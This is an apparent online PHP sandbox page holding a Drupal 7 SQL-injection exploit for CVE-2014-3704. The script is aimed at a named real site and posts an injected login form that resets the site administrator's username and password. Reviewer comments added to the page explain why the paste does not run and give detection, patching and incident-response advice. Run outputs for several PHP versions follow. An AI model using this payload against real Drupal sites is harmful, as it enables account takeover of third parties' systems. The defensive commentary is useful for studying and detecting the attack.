<?php// Title : Drupal Core 7.x Prior 7.32 - SQL Injection// Author : sn// Link : http://www.drupal.com// Version: 7.x Prior to 7.32// CVE : CVE-2014-3704// Site : http://siph0n.net// Config$site = "http://claro.com.br"; // site & site dir$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";//$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $site . "/?q=node&destination=node");curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);$server_output = curl_exec($ch);curl_close($ch);if(strpos($server_output, "mb_strlen() expects parameter 1 to be string")) {echo "Success! Please login with \"admin\":\"admin\" at {$site}/user/login";} else {echo "Failed";}
// NOTE(review): as pasted this line is inert. The opening tag is not followed by
// whitespace, so the runs recorded on this page either echo the source verbatim
// (8.3.5) or parse `php` as an undefined constant (7.2 - 8.0). In the latter case
// everything from the first `//` to the closing tag is a single comment, so no
// cURL call is made and nothing is sent.
//
// Scope, per the header fields above: CVE-2014-3704, SQL injection in Drupal core
// 7.x before 7.32. Remediation is upgrading core to 7.32 or later.
//
// Detection: the POST body carries SQL text inside an array key of the `name`
// field of the user_login_block form, whereas a normal login sends `name` as a
// scalar. Flag login requests whose parameter keys contain spaces, semicolons or
// SQL keywords.
//
// The success test looks in the response for the PHP warning
// "mb_strlen() expects parameter 1 to be string". The same string in web or PHP
// error logs is worth searching for, and display_errors should be off in
// production so the warning is not returned to the client.
//
// Incident response: the injected statement rewrites name and pass for uid 1, so
// on a site that was reachable while unpatched, compare that row against backups
// and treat an unexpected change as a compromise to investigate, not only as a
// password to reset.
?>
Output for 8.3.5
Warning: PHP Startup: Unable to load dynamic library 'sodium.so' (tried: /usr/lib/php/8.3.5/modules/sodium.so (libsodium.so.23: cannot open shared object file: No such file or directory), /usr/lib/php/8.3.5/modules/sodium.so.so (/usr/lib/php/8.3.5/modules/sodium.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
<?php// Title : Drupal Core 7.x Prior 7.32 - SQL Injection// Author : sn// Link : http://www.drupal.com// Version: 7.x Prior to 7.32// CVE : CVE-2014-3704// Site : http://siph0n.net// Config$site = "http://claro.com.br"; // site & site dir$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";//$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $site . "/?q=node&destination=node");curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);$server_output = curl_exec($ch);curl_close($ch);if(strpos($server_output, "mb_strlen() expects parameter 1 to be string")) {echo "Success! Please login with \"admin\":\"admin\" at {$site}/user/login";} else {echo "Failed";}?>
Output for 8.0.13
Fatal error: Uncaught Error: Undefined constant "php" in /in/boZOu:1
Stack trace:
#0 {main}
thrown in /in/boZOu on line 1
Process exited with code 255.
Output for 7.2.0 - 7.2.13, 7.3.32 - 7.3.33, 7.4.33
Warning: Use of undefined constant php - assumed 'php' (this will throw an Error in a future version of PHP) in /in/boZOu on line 1